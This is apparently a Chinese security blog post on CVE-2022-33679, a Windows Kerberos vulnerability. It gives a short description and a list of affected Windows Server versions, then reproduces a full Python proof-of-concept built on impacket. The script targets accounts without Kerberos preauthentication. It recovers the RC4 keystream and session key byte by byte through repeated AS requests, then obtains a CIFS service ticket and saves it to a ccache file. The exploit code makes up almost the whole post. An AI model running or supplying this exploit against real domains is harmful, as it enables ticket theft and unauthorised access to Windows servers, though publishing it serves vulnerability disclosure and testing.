【CVE-2022-33679】Microsoft Windows Kerberos 安全漏洞POC
作者:Sec-Labs | 发布时间:
漏洞介绍
Microsoft Windows Kerberos是美国微软(Microsoft)公司的一个用于在网络集群中进行身份验证的软件。Kerberos 同时作为一种网络认证协议,其设计目标是通过密钥系统为客户机/服务器应用程序提供强大的认证服务。
Microsoft Windows Kerberos存在安全漏洞。以下产品和版本受到影响:Windows Server 2019,Windows Server 2019 (Server Core installation),Windows Server 2022,Windows Server 2022 (Server Core installation),Windows Server 2022 Azure Edition Core Hotpatch,Windows Server 2016,Windows Server 2016 (Server Core installation),Windows Server 2008 for 32-bit Systems Service Pack 2,Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation),Windows Server 2008 for x64-based Systems Service Pack 2,Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation),Windows Server 2008 R2 for x64-based Systems Service Pack 1,Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation),Windows Server 2012,Windows Server 2012 (Server Core installation),Windows Server 2012 R2,Windows Server 2012 R2 (Server Core installation)。
项目地址
https://github.com/Bdenneu/CVE-2022-33679
POC
CVE-2022-33679.py
import datetime
import random
import argparse
import logging
import sys
from binascii import hexlify, unhexlify
from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import noValue
from impacket import version
from impacket.examples import logger
from impacket.examples.utils import parse_credentials
from impacket.krb5.kerberosv5 import KerberosError, sendReceive
from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, \
PA_ENC_TS_ENC, AS_REP, EncryptedData, EncASRepPart, seq_set, \
seq_set_iter, KERB_ERROR_DATA, HostAddress, HostAddresses, Ticket
from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REQ, TGS_REP, EncTGSRepPart
from impacket.krb5.types import KerberosTime, Principal
from impacket.krb5.types import Ticket as TTicket
from impacket.krb5 import constants
from impacket.krb5.crypto import Key
from impacket.krb5.ccache import Principal as CPrincipal
from impacket.krb5.ccache import CCache, Header, Credential, Times, CountedOctetString
try:
from impacket.krb5.ccache import KeyBlockV4 as KeyBlock
except:
from impacket.krb5.ccache import KeyBlock
from arc4 import ARC4
try:
rand = random.SystemRandom()
except NotImplementedError:
rand = random
pass
class TGTBrute:
def __init__(self, target, domain, servername, options):
self.__user = target
self.__domain = domain
self.__servername = servername
self.__options = options
self.__kdcHost = options.dc_ip
self.__asReq = None
self.__reqBody = None
self.__encodedPacRequest = None
def prepareAsReq(self, requestPAC=True):
rsadsi_rc4_md4 = -128
self.__asReq = AS_REQ()
domain = self.__domain.upper()
serverName = Principal('krbtgt/%s'%domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
pacRequest = KERB_PA_PAC_REQUEST()
pacRequest['include-pac'] = requestPAC
self.__encodedPacRequest = encoder.encode(pacRequest)
self.__asReq['pvno'] = 5
self.__asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
self.__reqBody = seq_set(self.__asReq, 'req-body')
opts = list()
opts.append( constants.KDCOptions.forwardable.value )
opts.append( constants.KDCOptions.renewable.value )
opts.append( constants.KDCOptions.proxiable.value )
self.__reqBody['kdc-options'] = constants.encodeFlags(opts)
seq_set(self.__reqBody, 'sname', serverName.components_to_asn1)
seq_set(self.__reqBody, 'cname', userName.components_to_asn1)
if domain == '':
raise Exception('Empty Domain not allowed in Kerberos')
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
self.__reqBody['realm'] = domain
self.__reqBody['till'] = KerberosTime.to_asn1(now)
self.__reqBody['rtime'] = KerberosTime.to_asn1(now)
self.__reqBody['nonce'] = rand.getrandbits(31)
supportedCiphers = (rsadsi_rc4_md4,)
seq_set_iter(self.__reqBody, 'etype', supportedCiphers)
def getTGT(self, requestPAC=True):
self.prepareAsReq()
self.__asReq['padata'] = noValue
self.__asReq['padata'][0] = noValue
self.__asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
self.__asReq['padata'][0]['padata-value'] = self.__encodedPacRequest
for i in range(20): # Add padding for more known bytes:
addr = HostAddress()
addr['addr-type']=1
addr['address']=bytes([0,0,0,i])
self.__reqBody['addresses'][i] = addr
message = encoder.encode(self.__asReq)
try:
r = sendReceive(message, domain, self.__kdcHost)
except KerberosError as e:
if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
logging.error(" RC4 is not supported")
exit()
else:
raise
return r
def sendEncTs(self, data, requestPAC=True):
self.prepareAsReq()
encryptedData = EncryptedData()
encryptedData['etype'] = -128
encryptedData['cipher'] = data
encodedEncryptedData = encoder.encode(encryptedData)
self.__asReq['padata'] = noValue
self.__asReq['padata'][0] = noValue
self.__asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_ENC_TIMESTAMP.value)
self.__asReq['padata'][0]['padata-value'] = encodedEncryptedData
self.__asReq['padata'][1] = noValue
self.__asReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
self.__asReq['padata'][1]['padata-value'] = self.__encodedPacRequest
message = encoder.encode(self.__asReq)
success = True
try:
r = sendReceive(message, domain, self.__kdcHost)
except Exception as e:
success = False
return success
def RecoverKey(self, encryptedAsREP):
AsREPPlain = b'\x00'*24+b'y\x82\x02\x140\x82\x02\x10\xa0\x1b0\x19\xa0\x03\x02\x01\x80\xa1\x12\x04\x10'
RC4Flow = bytes([AsREPPlain[i]^encryptedAsREP[i] for i in range(45)])
#first byte of the key
now = datetime.datetime.utcnow()
Timestamp = (KerberosTime.to_asn1(now)).encode()
sTimestamp = len(Timestamp)+1
encodedTimeStamp = bytes([0 for i in range(24)])+bytes([0x30, sTimestamp+4, 0xa0, sTimestamp+2, 0x18, sTimestamp])+ Timestamp
encryptedTimeStamp = bytes([RC4Flow[i]^encodedTimeStamp[i] for i in range(45)])
found = False
for i in range(256):
if self.sendEncTs(encryptedTimeStamp+bytes([i])):
RC4Flow += bytes([i])
logging.info("Byte 0: %02x"%i)
found = True
break
if found == False:
logging.error("No matching byte")
exit()
for j in range(4):
found = False
encodedTimeStamp = bytes([0 for i in range(24)])+bytes([0x30, 0x81+j])+bytes([0])*j
encodedTimeStamp += bytes([sTimestamp+4, 0xa0, sTimestamp+2, 0x18, sTimestamp])+ Timestamp
encryptedTimeStamp = bytes([RC4Flow[i]^encodedTimeStamp[i] for i in range(46+j)])
for i in range(256):
if self.sendEncTs(encryptedTimeStamp+bytes([i])):
RC4Flow += bytes([i])
logging.info("Byte %d: %02x"%(j+1, i))
found = True
break
if found == False:
logging.error("No matching byte")
exit()
key = bytes([RC4Flow[i]^encryptedAsREP[i] for i in range(45, 50)]+[0xab]*11)
return key
def TGTtoTGS(self, TGT, sessionKey):
rsadsi_rc4_md4 = -128
serverName = Principal('cifs/%s'%self.__servername, type=constants.PrincipalNameType.NT_SRV_INST.value)
ticket = TTicket()
ticket.from_asn1(TGT['ticket'])
apReq = AP_REQ()
apReq['pvno'] = 5
apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
opts = list()
apReq['ap-options'] = constants.encodeFlags(opts)
seq_set(apReq,'ticket', ticket.to_asn1)
authenticator = Authenticator()
authenticator['authenticator-vno'] = 5
authenticator['crealm'] = TGT['crealm'].asOctets()
clientName = Principal()
clientName.from_asn1( TGT, 'crealm', 'cname')
seq_set(authenticator, 'cname', clientName.components_to_asn1)
now = datetime.datetime.utcnow()
authenticator['cusec'] = now.microsecond
authenticator['ctime'] = KerberosTime.to_asn1(now)
encodedAuthenticator = encoder.encode(authenticator)
cipher = ARC4(sessionKey[:8])
encryptedEncodedAuthenticator = cipher.encrypt(b'\x00'*24+encodedAuthenticator)
apReq['authenticator'] = noValue
apReq['authenticator']['etype'] = rsadsi_rc4_md4
apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
encodedApReq = encoder.encode(apReq)
tgsReq = TGS_REQ()
tgsReq['pvno'] = 5
tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
tgsReq['padata'] = noValue
tgsReq['padata'][0] = noValue
tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
tgsReq['padata'][0]['padata-value'] = encodedApReq
reqBody = seq_set(tgsReq, 'req-body')
opts = list()
opts.append( constants.KDCOptions.forwardable.value )
opts.append( constants.KDCOptions.renewable.value )
opts.append( constants.KDCOptions.renewable_ok.value )
opts.append( constants.KDCOptions.canonicalize.value )
reqBody['kdc-options'] = constants.encodeFlags(opts)
seq_set(reqBody, 'sname', serverName.components_to_asn1)
reqBody['realm'] = domain
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
reqBody['till'] = KerberosTime.to_asn1(now)
reqBody['nonce'] = rand.getrandbits(31)
seq_set_iter(reqBody, 'etype',
(
int(constants.EncryptionTypes.rc4_hmac.value),
int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
int(constants.EncryptionTypes.des_cbc_md5.value),
)
)
message = encoder.encode(tgsReq)
r = sendReceive(message, self.__domain, self.__kdcHost)
return r
def TGSToCCache(self, TGS, sessionKey): #from CCache.fromTGT
ccache = CCache()
ccache.headers = []
header = Header()
header['tag'] = 1
header['taglen'] = 8
header['tagdata'] = b'\xff\xff\xff\xff\x00\x00\x00\x00'
ccache.headers.append(header)
tmpPrincipal = Principal()
tmpPrincipal.from_asn1(TGS, 'crealm', 'cname')
ccache.principal = CPrincipal()
ccache.principal.fromPrincipal(tmpPrincipal)
# Now let's add the credential
encryptedTGSREP = bytes(TGS['enc-part']['cipher'])
cipher = ARC4(sessionKey[:8])
plainText = cipher.decrypt(bytes(encryptedTGSREP))[24:]
encTGSRepPart = decoder.decode(plainText, asn1Spec = EncTGSRepPart())[0]
credential = Credential()
server = Principal()
server.from_asn1(encTGSRepPart, 'srealm', 'sname')
tmpServer = CPrincipal()
tmpServer.fromPrincipal(server)
credential['client'] = ccache.principal
credential['server'] = tmpServer
credential['is_skey'] = 0
credential['key'] = KeyBlock()
credential['key']['keytype'] = int(encTGSRepPart['key']['keytype'])
credential['key']['keyvalue'] = encTGSRepPart['key']['keyvalue'].asOctets()
credential['key']['keylen'] = len(credential['key']['keyvalue'])
credential['time'] = Times()
credential['time']['authtime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['authtime']))
credential['time']['starttime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['starttime']))
credential['time']['endtime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['endtime']))
# after kb4586793 for cve-2020-17049 this timestamp may be omitted
if encTGSRepPart['renew-till'].hasValue():
credential['time']['renew_till'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['renew-till']))
flags = ccache.reverseFlags(encTGSRepPart['flags'])
credential['tktflags'] = flags
credential['num_address'] = 0
credential.ticket = CountedOctetString()
credential.ticket['data'] = encoder.encode(TGS['ticket'].clone(tagSet=Ticket.tagSet, cloneValueFlag=True))
credential.ticket['length'] = len(credential.ticket['data'])
credential.secondTicket = CountedOctetString()
credential.secondTicket['data'] = b''
credential.secondTicket['length'] = 0
ccache.credentials.append(credential)
return ccache
def run(self):
logging.info("Getting TGT - Retrieving AS-REP")
tgt = self.getTGT()
decodedtgt = decoder.decode(tgt, asn1Spec = AS_REP())[0]
encryptedAsREP = bytes(decodedtgt['enc-part']['cipher'])
logging.info("Trying to recover the RC4 Flow")
sessionKey = self.RecoverKey(encryptedAsREP)
logging.info("Recovered Session key: %s"%sessionKey.hex())
TGS = self.TGTtoTGS(decodedtgt, sessionKey)
logging.info("Got TGS for %s"%self.__servername)
decodedtgs = decoder.decode(TGS, asn1Spec = TGS_REP())[0]
ccache = self.TGSToCCache(decodedtgs, sessionKey)
logging.info("Saving ticket in %s" % (self.__user+'_'+self.__servername+'.ccache'))
ccache.saveFile(self.__user+'_'+self.__servername+'.ccache')
# Process command-line arguments.
if __name__ == '__main__':
print(version.BANNER)
parser = argparse.ArgumentParser(add_help = True, description = "Retrieve a TGT for a user having"
"'Do not require Kerberos preauthentication' set and export their TGS of the given server")
parser.add_argument('target', action='store', help='domain/username')
parser.add_argument('serverName', action='store', help='server name')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) '
'specified in the target parameter')
options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
domain, username, password = parse_credentials(options.target)
if domain == '':
logging.critical('Domain should be specified!')
sys.exit(1)
try:
executer = TGTBrute(username, domain, options.serverName, options)
executer.run()
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error(str(e))
截图
